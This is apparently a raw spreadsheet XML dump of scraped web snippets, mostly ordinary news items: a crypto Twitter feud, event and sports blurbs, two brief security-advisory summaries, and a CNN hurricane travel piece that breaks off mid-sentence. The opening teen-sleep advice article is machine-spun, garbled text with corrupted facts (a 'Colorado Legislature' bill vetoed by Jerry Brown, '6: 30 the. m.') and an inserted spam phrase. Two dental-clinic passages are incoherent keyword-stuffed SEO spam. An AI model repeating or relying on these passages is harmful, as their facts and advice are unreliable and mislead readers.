school, going to the nurse’s office, and even pouring some sort of bowl of Cheerios and falling asleep in them, alone Carskadon tells. Limit caffeine — even more than you already undertake. After education, many teenagers grab any soda and also an energy consume to electrical power through the other countries in the afternoon. Nonetheless this basically makes bedtime on time harder, which, sequentially, makes the following day harder. Typically the disruptions accumulate. In the Mott survey, fifty four percent of parents had their particular teens relieve caffeine at night, notes Clark, although your lover suggests performing back early on in the daytime or even totally. Draw back for the crammed set up. This is antithetical to what countless parents an excellent source of school trainees and some individuals themselves imagine they should because of get into institution. But do you have a teen will want to star inside the school have fun, run regarding student authorities and be typically the starting quarterback for the high school football crew? “Pick one particular, ” says Carskadon. Teach effort management. Without having four numerous hours straight to acquire homework completed at night, crack it up in to chunks. “If you have 45 minutes before your activity, proceed to the library and get one or two topics out of the way, ” Clark implies. Just before trying the drugstore nap aid, confer with your doctor. The particular Mott study suggests dads and moms frequently turn to remedies including melatonin plus over-the-counter drug treatments like Tylenol PM or maybe NyQuil. Although Clark promotes parents and teens go over these using a physician primary. Melatonin just isn’t always tender or productive, and professionals still don’t know much related to its extensive effects, according to the National Acadamies of Wellness. And the large use of OTC drugs is usually habit-forming in addition to hard on typically the liver. Pursue policy changes. Nearly all sleep professionals say it becomes healthier to get older children to get started school afterwards in the morning when compared with most Ough. S. the school districts accomplish. The Colorado Legislature flushed a charge last month necessitating most center schools plus high academic institutions to start basically no earlier than 6: 30 the. m. by simply 2021, yet Gov. Jerry Brown vetoed it in Thursday. A real change nationally won’t are available easily. “The school start out time concern is very fraught, ” Carskadon notes. Several teachers will be fighting the item, and being employed parents most likely are not able to shift their agendas and other youngster care bills. Endure, Clark and also Carskadon state, the most effective detail we mothers and fathers can do is normally listen to our youngsters — hit on them of their total sleep concerns and help these individuals set a new consistent sleep pencil in. It’s to not ever early (or too late) to find healthy ways to reduce daytime draws attentions to that can affect sleep at nighttime, whatever your age. Very best idea still, parents: We can set a homework answers website good example, by just putting our own electronics away — seriously away — at bed.</t>
  </si>
  <si>
    <t>The euphoria over the bitcoin price’s climb to a new 2019 high above $11,000 couldn’t last forever, and it wasn’t long before drama broke out on Crypto Twitter. | Source: YouTube (i), Shutterstock (ii). Image Edited by CCN. The euphoria that followed the bitcoin price’s climb to a new 2019 high above $11,000 couldn’t last forever, and it wasn’t long before some low-volume drama broke out over the weekend on Crypto Twitter. Seemingly apropos of nothing, Dan Held (@danhedl), a pal of Anthony Pampliano and legend of Bitcoin Twitter, reminded everyone that Ethereum mastermind Vitalik Buterin had once tried to raise money to build a quantum computer for Bitcoin mining. Vitalik Buterin’s Quantum Bitcoin Mining Ambitions FYI: Before founding Ethereum, Vitalik put considerable effort in 2013 into trying to convince investors to fund him in constructing a quantum computer to mine Bitcoin. (Note that no quantum computers able to solve practical problems are verified as existing as of early 2017) — Dan Hedl (@danheld) June 20, 2019 Buterin retorted that he was not trying to raise funds for a personal project. He also said: “I recommend you re-evaluate your model of me; the process may even convince you ethereum is interesting and worth your time to explore and participate in!” Held’s assertion was based on the following statement from 2016 by former Blockstream employee and Bitcoin Core developer Gregory Maxwell: “Vitalik’s project immediately before Ethereum is that he was collecting investments from people to fund building a computer program to solve NP-complete problems in polynomial time, supposedly by simulating a quantum computer. (Never mind that even real QC aren’t conjectured to be able to do that, nor does ‘simulation’ make any sense; unless BPP == BQP thats not even possible, and virtually all experts agree the complexity classes are probably not equivalent). He built up a reputation for himself writing tech explainers of other people’s ideas usually without any attribution (until someone complains), making him look like the author. Beyond ripping off other’s ideas, Vitalik has had virtually no interaction with Bitcoin developers, having never contributed to Bitcoin development.” We’re in massive overton window territory, techno-babble, science project $billion marketing, Theranos and far worse has been normalised, even earnestly defended by the persuaded. Society must claw it’s way back from the Idiocracy outcome. Bitcoin dominance index should be &gt; 90% — Adam Back (@adam3us) June 22, 2019 Before long, here comes Blockstream CEO Adam Back, arguably one of the foremost intellectual authorities on secure computing and cryptography, pointing out that the idea was unrealistic from inception. Rather than accept that criticism, Buterin fell back on the scientific fact that the project wasn’t impossible. &gt; Proposal was obviously bogus to anyone with any comp sci knowledge I actually still disagree! We don’t even know for sure that P != NP, and P = NP would be even more powerful than efficient quantum-on-classical simulation. — Vitalik Non-giver of Ether (@VitalikButerin) June 21, 2019 Back said the idea was baseless. Srsly. Dude! Quantum is fundamentally more powerful. You can’t make a simulation of a fundamentally higher capability per step quantum computer execute faster on a Von Neumann machine! Really what that hypothesizes is a faster classical algorithm for SHA256 mining, definitionally — Adam Back (@adam3us) June 21, 2019 He also said that even if it worked, it would require a lot of realities to change, including the overall security of SHA256 becoming compromised. Making a quantum simulator won’t find it for you if it even usefully exists, which would require SHA256 to be broken by a massive margin. The defects are found by mathematical cryptanalysis as evidenced by sha1, md5, md4 attack history. — Adam Back (@adam3us) June 21, 2019 “Not Impossible” ≠ Ready For Investment Another user pointed out that just because an idea is not impossible, doesn’t mean you should go raising money for it. You may have a point but lack of proof something is not impossible is typically not considered as sufficient foundation for raising funds. Ideas that get funding have some degree of credibility. Likely what people criticize you for. — Ladislav Stejskal (@ladislavtweet) June 21, 2019 Astonishingly, Buterin then characterized himself as having “shilled” for the quantum computing project back in the day. Oh I’m not at all saying that myself shilling for that specific team was anywhere remotely close to a good idea. Only challenging the assertion that one could have known that they were liars because what they were trying to do was *literally mathematically impossible*. — Vitalik Non-giver of Ether (@VitalikButerin) June 21, 2019 Back refused to leave it there, as the conversation entered its third day on Saturday. Back ranted that Buterin had utilized “magical thinking” and expressed concern about the state of the industry. To most tech observers it is comp sci perpetual motion level magical thinking you’re still doubling down on. I wonder where humanity ends, Idiocracy? if such things get 100x funding vs world class engineering with rock solid due diligence, actually innovating the bleeding edge. — Adam Back (@adam3us) June 22, 2019 Referring to the last bull run, he fears that a willfully ignorant investor community may enable billions of more dollars to be wasted. Sorry to be blunt but these types of nonsense projects and the ICO craze following that, most of which are down 99% without building anything, or high school science project plus billion dollar marketing actually a menace to human progress. Vented, back to being constructive… — Adam Back (@adam3us) June 22, 2019 obviously it’s a free world, but rather than tech discourse, they attacked science, economics and common sense with $billion dollar marketing budgets “maximalist”, etc. Now I’m toxic? Sorry, not sorry: a ridiculous boondoogle is still ridiculous and waving a red flag won’t change — Adam Back (@adam3us) June 22, 2019 In his final salvo, Back fumed that “Bitcoin dominance” should be greater than 90%. According to Coinmarketcap.com, BTC dominance in crypto markets is just under 60% at press time. BTC dominance is the amount of the overall market capitalization dedicated exclusively to Bitcoin Core. We’re in massive overton window territory, techno-babble, science project $billion marketing, Theranos and far worse has been normalised, even earnestly defended by the persuaded. Society must claw it’s way back from the Idiocracy outcome. Bitcoin dominance index should be &gt; 90% — Adam Back (@adam3us) June 22, 2019 Back didn’t come out unscathed. A Bitcoin Cash supporter quipped that it was Back and the small-block Bitcoin community’s own fault that Bitcoin dominance had fallen over the years. It should be…but you went and fucked that up. — Frank Dashwood (@DJ_Erock23) June 22, 2019 Back chose not to respond.</t>
  </si>
  <si>
    <t>FUE HAIR TRANSPLANT: A PRIMER – However, the surgeon’s, team’s and clinic’s skill and capability. FUE, in fact, is the preferred method for near all accident and transplant-related scar repair. FUE hair transpant. For more than 40 years the caring professionals at Cypress View Veterinary Clinic have been providing quality service and care to our clients and patients in the Medicine Hat area. Since moving to our current location in 1996, Serving the Medicine Hat community for over 40 years, Crestwood Dental Clinic features a diverse group of dentists, hygienists, and dental assistants. Each brings their own unique experience in the field to the office. With our well trained team and up-to-date technology, our clinic works to accommodate all your family’s dental care needs. Best Dental Clinic In Medicine Hat Alberta A rapid review of barriers to oral healthcare for vulnerable people – What are the best methodologies. Who will tend the dental safety net? J Calif Dent Assoc 2014; 42: 112-118. 19. Amin M S, Park Meadows Dental – 1854 Southview Dr SE Suite 101, Medicine Hat, Alberta T1A 8L9 – Rated 4.1 based on Crestwood dentists in Medicine Hat provide a range of restorative and cosmetic dental services. We make the dental struggle disappear! Contact us today!. Crestwood Dental – Your Medicine Hat Dentists At Crestwood Dental Clinic, we understand the struggle. Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Veneers and more. We are looking forward to your visit to our. At Park Meadows Dental in Medicine Hat, Alberta we help you get a beautiful smile that turns heads. Emergencies are seen same day. All services provided under one roof. If you have a dental phobia, we can provide sedation options or laughing gasto ease your. The Best Dentists in Medicine Hat on Yelp. Read about places like: Courtyard Dental Centre, Crestwood Dental Clinic, Southside Dental, Sun City Dental, Dr. Brenda Krasko Family Dental. Dental in Medicine Hat (+36 results ) Dentists and dental clinics, dental clinics and offices, dental and dentist, dentist s office, dental services, Find opening hours and closing hours from the Dentists &amp; Dental Clinics category in Medicine Hat, AB and other contact details such as address, phone number, website. Tips to finding Medicine Hat AB dentists. Get to know your dentist: The best way to find a new dentist in Medicine Hat AB is to get to know them personally before you require dental care – we are talking about someone who spends a lot of time poking around your mouth with metal instruments, after all. Medicine Hat, AB Dentist, Vista Dental provides Dental Implants, Tooth Extractions, Root Canals, Wisdom Teeth Treatment, and Sedation Dentistry. Call us today!. The dentists and team at River Dental in Medicine Hat, Alberta will ensure that your first and future visits to our practice are comfortable and informative. We encourage you to read what others are saying so you can feel confident with choosing us as your new dental home. Reviews Contact Us With two convenient locations, finding a “dentist near me” in Succasunna or Hackettstown has never been easier. We’d.</t>
  </si>
  <si>
    <t>UFC flyweight titleholder Valentina Shevchenko hopes to inspire a new breed of female fighters after a whirlwind visit to Adelaide.</t>
  </si>
  <si>
    <t>Mobile, Alabama Police: At least 10 shot at Ladd Peebles Stadium after HS football game; 2 In custody pic.twitter.com/HLvX58Qj20 — Breaking911 (@Breaking911) August 31, 2019 MOBILE, Ala. (WKRG) – Mobile police have arrested a teenager in connection to a shooting at Ladd Peebles Stadium on Friday night. Police have updated the number of shooting victims […]</t>
  </si>
  <si>
    <t>4.44pm 7th August 2019 – Travel – This story was updated on Wednesday, August 7th, 2019 International Golf Travel Market (IGTM) 2019, the leading business to business event for the golf travel community announces the headline content of its official welcome forum. Following a re-launch in its 22nd year the event will be taking place in Marrakech, Morocco 14th-17th October 2019. Naga Munchetty The overall theme will be ‘Grow Golf Together’ to highlight how international golf travel suppliers can widen their appeal to a more diverse audience, including women and millennials. Headline speakers include BBC’s Naga Munchetty, R&amp;A’s Director of Sustainability Steve Isaac and IAGTO’s CEO Peter Walton. A familiar key face of BBC News, Naga Munchetty is one of the main presenters for the BBC’s flagship Breakfast programme. Keen to empower and inspire women to achieve success, Naga was named in the Asian Power list as one of Britain’s most powerful Asian women. Naga will be sharing her experiences as a female golfer and will talk about how golf resorts and tour operators can appeal more to the female golfer. Steve Isaac, Director of Sustainability at R&amp;A will be looking at how to improve the golf experience and share insights into the R&amp;A’s sustainability initiatives. These include Golf Course 2030, GreenLinks (The Open’s sustainability programme) and support for greenkeeper education. The R&amp;A works in collaboration with many organisations, including national governing bodies in 143 countries, greenkeepers, club managers, course owners and architect associations. Peter Walton, CEO of IAGTO, will also be providing an industry update. David Todd, IGTM Event Manager commented: “With our refreshed brand image and website, together with a new organising team, it’s time for a change. We wanted to shake up the content of our official opening address for our participants; highlighting the changes in golf travel today and how businesses capitalising in this area can go above and beyond to ensure they are keeping up with the needs of their clients and appeal to a wider audience.” Steve Isaac, Director of Sustainability at R&amp;A Over 450 golf tourism suppliers from over 40 countries will join 400+ pre-qualified buyers from 45 countries for 4 days of pre-scheduled appointments, networking and education sessions. This year has seen a huge rise in US buyers with a 71% year on year increase. Some of the exhibiting companies already signed up include The PGA, Dominican Republic Tourist Board, Tourism Ireland, Monte Rei (Portugal), Costa Navarino (Greece), Andalucian Tourist Board, European Tour Destinations and Cape Kidnappers and Kauri Cliffs (New Zealand). On the media side, over 40 international travel and golf journalists will also be attending to seek upcoming stories on what’s new in golf travel. The event will be designed to further enhance the business opportunities for this leisure sector where the spend per head is 120% more in a destination than the average tourist according to the latest SPORTS MARKETING SURVEYS report. A series of educational content sessions will also be available for everyone to attend to provide participants with industry insights which will help grow their golf business. Networking events are planned as an added opportunity to continue to build relationships, as well as the official golf tournament on 14th October taking place at a number of Morocco’s most famous golf courses. IGTM www.IGTMarket.com Source link</t>
  </si>
  <si>
    <t>The user-domain-whitelist plugin before 1.5 for WordPress has CSRF. Published at: August 20, 2019 at 04:15PM View on NVD website The post New vulnerability on the NVD: CVE-2014-10381 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Labor leader Anthony Albanese says Australia should take its time to decide whether or not to join a US mission to protect ships in the Strait of Hormuz.</t>
  </si>
  <si>
    <t>All the build up as the Magpies bask in a fine win against Spurs This post written by Sean McCormick originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
    <t>Country Women’s Association member Sara Kenny says the group’s aim is to “give something back” to their community and to “give women of all ages purpose to their lives”. Speaking on Paul Murray Live’s Our Town tour, Ms Kenny said CWA gives so many opportunities, both financial and social, and they’re ethical in how they distribute their funds to make an impact. Image: Getty</t>
  </si>
  <si>
    <t>Looking to hire TWO female attendants in SCARBOROUGH to assist a disabled mother and her two young children with aspects of daily living, house cleaning, cooking, and other tasks as required. Training is provided. This position is NOT suitable for students. The ideal candidates will be reliable, flexible, mature and good with kids. The successful .. Read more</t>
  </si>
  <si>
    <t>Good selection on half price specials. Use WISH GC for further 5% discount.</t>
  </si>
  <si>
    <t>Tenants crammed into squalid properties, forced to pay over the odds in rent and suffer at the hands of unscrupulous landlords have been failed by a flagship scheme to crack down on appalling rental standards. A freedom of information act request submitted by This is Money has revealed that just 12 landlords have been registered to the government’s rogue landlord database in the 16 months since the system was set up. Heralded as a key weapon in the fight against serious criminal landlords at its launch last April, government officials claimed the register would help local authorities to ban the worst offenders from continuing to rent out properties. But in spite of the government warning there are as many as 10,500 rogue landlords still letting homes to tenants across the UK, just 12 have been registered on the database in that time – for a total of 19 offences committed across 10 local authorities. An FOI request has revealed that just 12 landlords are registered on the entire database The Ministry of Housing, Communities and Local Government confirmed to This is Money that one local authority has three landlords on the database, while the other nine local authorities have just one each. David Cox, chief executive of the Association of Residential Letting Agents Propertymark, said: ‘These figures are shocking but unsurprising. ‘Law after law has been passed but not policed. The vast majority of landlords are professional, but we all know that there are more than 12 out there who aren’t. ‘However, until there is proper supervision of the 150 laws that already exist to govern how landlords let properties, there seems little point in introducing more.’ The derisory figures will come as a blow to the housing ministry, which is currently preparing to open up its register to the general public for the first time. When this was announced the then-Secretary of State for Housing James Brokenshire said: ‘This database has the potential to ensure that the worst landlords are banned and it is right that we unlock this crucial information for new tenants.’ That potential is not currently being reached in spite of existing rules designed to stamp out bad practice. Landlords are subject to a raft of regulation and must hold certain licences for different types of properties. Usually, local authorities have the power to refuse these licences if they consider a landlord not to be ‘fit and proper’. New rules relating to so-called houses in multiple occupation (HMOs) brought in late last year also dramatically increased the number of rental properties requiring licences from the local council. Those rules came as part of a wide-ranging set of measures from the government designed to stamp out overcrowding and stop rogue landlords from renting out properties in squalid conditions. But we revealed that the majority of local authorities don’t know how many unlicensed HMOs are in their area, let alone where they are, making it virtually impossible to police poor standards without tenants or neighbours reporting problems. Local authorities can also issue what are known as ‘selective‘ licences. These require tenants as well as landlords to be vetted, and are usually implemented in boroughs with high levels of anti-social behaviour, low housing demand, poor property conditions, high levels of migration, high levels of deprivation, or high levels of crime. Failing to obtain a licence in these cases is a criminal offence and can result in prosecution or a financial penalty of up to £30,000. Local authorities can also apply to courts for a banning order to be issued against serious offenders, which bans them from letting their property to tenants. Cox added: ‘The laws that govern the private rented sector are so complicated, complex and intertwined that it’s almost impossible to see what needs to be done. ‘There are multiple laws coming out of multiple government departments, each of which have different procedures and are prosecuted through different courts. ‘Councils are already overstretched and the register, which should be helping to improve the situation, adds another layer of bureaucracy.’ Under its current scope, the government’s rogue landlord database is supposed to hold information on landlords convicted of crimes like harassment, fraud, criminal damage, or permitting too many people to live in one property. A statement from the Ministry of Housing said: ‘The database is targeted at only the very worst and persistent offenders, those who have committed banning order offences. ‘It takes time to secure convictions or civil penalty notices for offences that may be recorded on the database. ‘The offence must have been committed after 6 April 2018, the landlord or agent must have been prosecuted and convicted, and the appeals process must be complete. ‘The local authority can then apply to the first-tier tribunal for a banning order and a hearing must be scheduled. When a banning order has been imposed, the local authority must record it on the database.’ Last year the Ministry of Housing estimated there were 10,500 landlords breaking the law before 6 April 2018 when the register was first established, meaning it’s likely there are still around that number breaking the law today. The government is currently consulting on whether it should widen the scope of the register to include less serious offenders. Currently under review is whether offences such as engaging in a prohibited unfair commercial practice, charging tenants an unfair fee, failing to belong to a redress scheme, or failing to deal with pests such as mice or rats, should be included. #fiveDealsWidget .dealItemTitle#mobile {display:none} #fiveDealsWidget {display:block; float:left; clear:both; max-width:636px; margin:0; padding:0; line-height:120%; font-size:12px} #fiveDealsWidget div, #fiveDealsWidget a {margin:0; padding:0; line-height:120%; text-decoration: none; font-family:Arial, Helvetica ,sans-serif} #fiveDealsWidget .widgetTitleBox {display:block; float:left; width:100%; background-color:#B11B16; } #fiveDealsWidget .widgetTitle {color:#fff; text-transform: uppercase; font-size:18px; font-weight:bold; margin:6px 10px 4px 10px; } #fiveDealsWidget a.dealItem {float:left; display:block; width:124px; margin-right:4px; margin-top:5px; background-color: #e3e3e3; min-height:200px;} #fiveDealsWidget a.dealItem#last {margin-right:0} #fiveDealsWidget .dealItemTitle {display:block; margin:10px 5px; color:#000; font-weight:bold} #fiveDealsWidget .dealItemImage, #fiveDealsWidget .dealItemImage img {float:left; display:block; margin:0; padding:0} #fiveDealsWidget .dealItemImage {border:1px solid #ccc} #fiveDealsWidget .dealItemImage img {width:100%; height:auto} #fiveDealsWidget .dealItemdesc {float:left; display:block; color:#e22953; font-weight:bold; margin:5px;} #fiveDealsWidget .dealItemRate {float:left; display:block; color:#000; margin:5px} #fiveDealsWidget .dealFooter {display:block; float:left; width:100%; margin-top:5px; background-color:#e3e3e3 } #fiveDealsWidget .footerText {font-size:10px; margin:10px 10px 10px 10px;} @media (max-width: 635px) { #fiveDealsWidget a.dealItem {width:19%; margin-right:1%} #fiveDealsWidget a.dealItem#last {width:20%} } @media (max-width: 560px) { #fiveDealsWidget #desktop {display:none} #fiveDealsWidget .widgetTitleBox {background-color:#e3e3e3; } #fiveDealsWidget .widgetTitle {color:#000} #fiveDealsWidget #mobile {display:block!important} #fiveDealsWidget a.dealItem {background-color: #fff; height:auto; min-height:auto} #fiveDealsWidget a.dealItem {border-bottom:1px solid #ececec; margin-bottom:5px; padding-bottom:10px} #fiveDealsWidget a.dealItem#last {border-bottom:0px solid #ececec; margin-bottom:5px; padding-bottom:0px} #fiveDealsWidget a.dealItem, #fiveDealsWidget a.dealItem#last {width:100%} #fiveDealsWidget .dealItemContent, #fiveDealsWidget .dealItemImage {float:left; display:inline-block} #fiveDealsWidget .dealItemImage {width:35%; margin-right:1%} #fiveDealsWidget .dealItemContent {width:63%} #fiveDealsWidget .dealItemTitle {margin: 0px 5px 5px; font-size:16px} #fiveDealsWidget .dealItemContent .dealItemdesc, #fiveDealsWidget .dealItemContent .dealItemRate {clear:both} }</t>
  </si>
  <si>
    <t>Good Morning America host Lara Spencer is accused of sexism after laughing at news the Duke and Duchess of Cambridge's son will take ballet lessons as part of his upcoming school curriculum.</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/08/25/crypto-means-cryptotheology/ Crypto means cryptotheology Cryptocurrencies are a religion as much as they are a technology. They almost have to be, given their adherents’ gargantuan ambition of fundamentally changing how the world works. This means they attract charlatans, lunatics, frauds, and false prophets, and furious battles are waged over doctrinal hairspliitting; but it also means they inspire intransigent beliefs which can, and do, unify many thousands of wildly different people across continents and time zones. This occurred to me while I was rereading Gibbon’s Decline and Fall, as one does, and in particular its depictions of the early days of the Christian faith: But whatever difference of opinion might subsist between the Orthodox [church], the Ebionites, and the Gnostics, concerning the divinity or the obligation of the Mosaic law, they were all equally animated by the same exclusive zeal; and by the same abhorrence for idolatry ..,. the established religions of Paganism were seen by the primitive Christians in a much more odious and formidable light. It was the universal sentiment both of the church and of heretics, that the daemons were the authors, the patrons, and the objects of idolatry. For Orthodox church, Ebionites, and Gnostics, you can read perhaps, “Bitcoin maximalists”, “Blockchain not bitcoin,” and “Ethereum maximalists.” They disagree bitterly, but one view they all share is a disdain verging and frequently exceeding contempt for fiat currencies, untokenized assets, and most other aspects of money and finance as they are currently constructed. Instead they share a deep belief in the superiority, and inevitable supremacy, very different world. The superstitious observances of public or private rites were carelessly practised, from education and habit, by the followers of the established religion. But as often as they occurred, they afforded the Christians an opportunity of declaring and confirming their zealous opposition. By these frequent protestations their attachment to the faith was continually fortified; and in proportion to the increase of zeal, they combated with the more ardor and success in the holy war, which they had undertaken against the empire of the demons. I think few will disagree that, similarly, many cryptocurrency devotees seek out and seize every “opportunity of declaring and confirming their zealous opposition” to government money, central banks, rival maximalists, and other features of the monetary, financial, and/or centralized status quo. The careless Polytheist, assailed by new and unexpected terrors, against which neither his priests nor his philosophers could afford him any certain protection, was very frequently terrified and subdued by the menace of eternal tortures. His fears might assist the progress of his faith and reason; and if he could once persuade himself to suspect that the Christian religion might possibly be true, it became an easy task to convince him that it was the safest and most prudent party that he could possibly embrace. Similarly I don’t think it’s controversial to note that prophecies of the hyperinflation and collapse of national currencies, the downfall of central banks and fractional reserve banking in general, etc., are not unheard of among some of the … edgier … cryptocurrency people. One might even refer to the notion of “preaching the gospel” of deflationary, censorship-resistant cryptocurrency, sometimes in the hopes of scaring everyone who hears this doomsaying into buying some Bitcoin as a hedge. Of course the religious parallels do not end with Gibbon. Cryptocurrencies were given to us not by a known, living, breathing, flawed human being, but by a pseudonymous verging-on-mythical quasi-demigod. (Cf eg “Satoshi’s Vision.”) Mythically speaking, that’s easily analogized to Prometheus granting humanity fire, or Moses bringing the stone tablets down from Mount Sinai. They have real and false prophets. There’s even a “Bitcoin Jesus.” And all promise a better world tomorrow, while demanding sacrifices and inconveniences today. My tongue is obviously in cheek here — but I’m not entirely unserious. Of course all money is ultimately backed by faith (cf “full faith and credit.”) But this is I think unquestionably more true of cryptocurrencies, especially because, a decade on from their creation, they have failed — so far! — to transform the world to a degree anything like their proclaimed potential. Bitcoin itself is apparently going from strength to strength, as can be seen in its increasing dominance of total cryptocurrency market capitalization, but it’s still beyond tiny compared to the rest of the financial world. Its total trading volume as I write this is roughly ~$15 billion per day, which admittedly sounds like a lot, but compared to the $5.1 trillion a day for the forex market as a whole, it’s roughly one-quarter of one percent. More importantly, Bitcoin continues to technically iterate (although I’ve grown skeptical about Lightning, which it seems to me will always suffer from all the end-user inconveniences of prepaid credit cards, with few balancing advantages) and has hovered near or above $10,000 in value for months now. But the uncertainties and investigations regarding Tether remain a threatening cloud on its horizon. As for other cryptocurrencies, though — well, these are complex times. Ethereum, the best-known and perhaps most interesting, has gone from a wave of DAO excitement shortly after its launch, which faltered, to a wave of ICO madness and “fat protocol” DApps (decentralized applications), which also faltered, to the latest wave and watchword, “DeFi” aka decentralized finance. This essentially aims to reinvent all of Wall Street and the City of London on the blockchain(s), in the long term. Meanwhile, the technical underpinnings that would allow Ethereum to scale to Wall Street size, known as “Ethereum 2.0,” remain more notional than real. I’m a big fan of Ethereum (my own pet crypto project is built on it) and I don’t think DeFi is doomed to failure … but under the circumstances I can understand skepticism creeping in among those who are not true believers. There are plenty of other technically interesting cryptocurrency initiatives: from privacy coins such as ZCash, Monero, and Grin, to the use of Tezos by Brazil’s fifth largest bank for security tokens (again, DeFi), to the growth and stabilization of Cosmos’s “internet of blockchains,” to Blockstack’s total-app-installs graph beginning to look a little more exponential than linear, albeit with still-tiny y-axis numbers. However, I think it’s also fair to say that now that cryptocurrencies are no longer new, unknown, and fascinating, interest among both individuals and enterprises who are not true believers has waned considerably. The cultural whiplash one experiences when transitioning from a conference full of people convinced they are building a new technology that will transform the fundamental order of the world, to outsiders (even technical outsiders) remarking “oh, is that still a thing?” is increasingly sharp. That was probably true of the Christians after they ceased to be new and interesting, though, and in the end the Christians conquered the most powerful empire in the world from within. I am definitely not prophesying the same outcome here. I continue to think cryptocurrencies will remain a financial alternative, albeit a very significant and important one, used only by a few percent of people. But I am saying that seeming increasingly distant from the external consensus reality, being driven by intransigent and sometimes bewildering faith as much as rational analysis, and ongoing associations with a cloud of crazy scandal and hangers-on snake-oil salespeople — all of which would be catastrophic signs for, say, a traditional new startup — can actually be indicators of the strength, not weakness, of a strange new religion. Something to bear in mind as we move into the second decade of cryptocurrencies. Source: https://techcrunch.com/2019/08/25/crypto-means-cryptotheology/ The post Crypto means cryptotheology appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>KARAS DENTAL CLINIC, Dentist in Halton Hills, Ontario, 308 Guelph Street, Halton Hills, ON L7G 4B1 – Hours of Operation &amp; Customer Reviews. Add a company Share Share Tweet KARAS DENTAL CLINIC Canada Ontario Halton Hills KARAS DENTAL. Highest Rated Dental Clinic Near Halton Hills Best Dentists in Georgetown, Halton Hills, ON – South Georgetown Dental Care, Georgetown Denture Clinic, Diana Dental, Lefebvre Ronald, Mountainview Dental, Argyll Dental Office, Georgetown Dentistry, Trenton A W Denturist, Georgetown Dental. Locate and compare Dentists in Halton Hills Village Georgetown ON, Yellow Pages Local Listings. Find useful information, the address and the phone number Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated investor schemes. We act as. Full information about Georgetown Pharmacy Compounding Specialists &amp; Travel Clinic in Halton Hills: 118 Mill St #101, Halton Hills, ON L7G 2C5, Canada. Customer reviews, address, telephone number, fax, postal code, website address, work schedule, office. Ontario Halton Hills Dentists in Halton Hills 692 results for Dentists in Halton Hills, ON Market Place Dental Centre (3.1 km) 280 Guelph St Georgetown, ON, L7G 4B1 905-877-2273 Georgetown Marketplace Mall – Family &amp; CosmeticDentistry. Friendliest Dental Clinic Near Halton Hills Ongoing breastfeeding support and nutritional information is available at our WIC Clinic, Ron Wood Family. an equipment. Cosmetic Dentist In Halton Hills Best Dentists in Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Downtown Georgetown Dental, Sunnyview Dental – Georgetown, King's Cove Family Dental, Pownall Janet, DDs – Still Waters Dental, Market</t>
  </si>
  <si>
    <t>A succession of women who say Jeffrey Epstein sexually abused them voiced anger and defiance in a packed New York courtroom, expressing raw emotions during a dramatic hearing.</t>
  </si>
  <si>
    <t>Chinese Malay Dictionary – travel dictionary to translate Chinese to Malay. Click on the list to show Chinese or Malay synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Chinese Malay Dictionary →</t>
  </si>
  <si>
    <t>that LTD life</t>
  </si>
  <si>
    <t>https://bit.ly/2PctE6V LoginPress Review &amp; Tutorial Your WordPress login doesn’t need to be boring and insecure! LoginPress makes it easy to customize nearly ever feature of your … source</t>
  </si>
  <si>
    <t>Ubuntu Security Notice 4096-1 – Andrei Vlad Lutas and Dan Lutas discovered that some x86 processors incorrectly handle SWAPGS instructions during speculative execution. A local attacker could use this to expose sensitive information. Published at: August 14, 2019 at 03:36AM View on Packet Storm The post Ubuntu Security Notice USN-4096-1 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>(CNN) — Vacationers headed to Florida for the Labor Day holiday and the unofficial close of summer are in for a nerve-racking weekend. Hurricane Dorian is expected to strengthen to a powerful Category 4 storm by Sunday and is likely to make landfall along the Florida or Georgia coasts on Monday after rolling through the northern Bahamas over the weekend. Getting out of the storm’s path will be tricky, as its path is still unpredictable with four days to meander over very warm water. Flights American Airlines has issued a comprehensive list of Florida destinations that may be affected by the storm. Travel to, from or though those airports may be eligible for a change fee waiver for tickets purchased by August 29 for travel September 2-3. Full details of itineraries that qualify are listed on the airline’s web site. The advisory follows several previous waivers issued by American Airlines for destinations in the Caribbean. The carriers have posted those details on their web sites and are adding Florida destinations as the storm’s path evolves. Cruises Royal Caribbean cruise line’s private Bahamian island, Perfect Day at CocoCay, will be closed through September 4 so that local employees can secure and evacuate their families and homes, the company said on its web site. Six itineraries had been adjusted by Thursday morning to accommodate the island’s closure. Guests that pre-purchased Royal Caribbean shore excursions for CocoCay will receive refunds credited to their onboard accounts. Florida’s beautiful Cocoa Beach is among the Atlantic Coast spots that may see landfall Monday. dosecreative/iStockphoto/Getty Images On its web site, Carnival Cruise Line listed a series of sailings it is monitoring out of Port Canaveral, Jacksonville, Port of Miami and Tampa in Florida as well as one sailing out of Charleston, South Carolina. At midday Thursday, those sailings were expected to operate as scheduled, with the exception of a reversal of port order for a Carnival Sensation sailing out of the Port of Miami on August 31. “As the safety of our guests and crew is our number one priority, we will continue to keep an eye on the storm and provide timely updates as more information becomes available,” the advisory said. Disney Cruise Line posted an advisory about several sailings on its website. “At this time, based on the current predicted storm timing and path, we do not anticipate any changes to the Disney Fantasy sailing on Saturday, Aug. 31. We are closely monitoring potential implications for the Disney Dream sailings on Friday, Aug. 30 and Monday, Sept. 2,” the advisory posted Wednesday afternoon said. Amusement parks and other attractions While Dorian’s impact on the inland city packed with theme parks is not likely to be severe, Galaxy’s Edge faces a potentially soggy opening weekend and scores of disappointed fans who may opt to reschedule their visits. Universal Orlando Resort is monitoring the situation. “At this time our park operations and hours are continuing as normal. We have plans and procedures for serious weather that are time-proven and we will continue to make operating decisions as we learn more,” the company said in a statement. Kennedy Space Center Visitor Complex, one of Central Florida’s most popular tourist destinations, is monitoring the storm’s path and may move its Mobile Launch Platform inside. The facility tweeted that it would provide more details about facility operations as information becomes available. Change of plans Some travelers are proactively canceling Florida plans. Lindsey Wolf and her husband had planned to take their children, ages 8 and 10, kayaking and tubing on the Rainbow River with friends who had recently moved to the Ocala area, but the Atlanta family has made other plans. “It was an easy decision to make to cancel the trip considering how 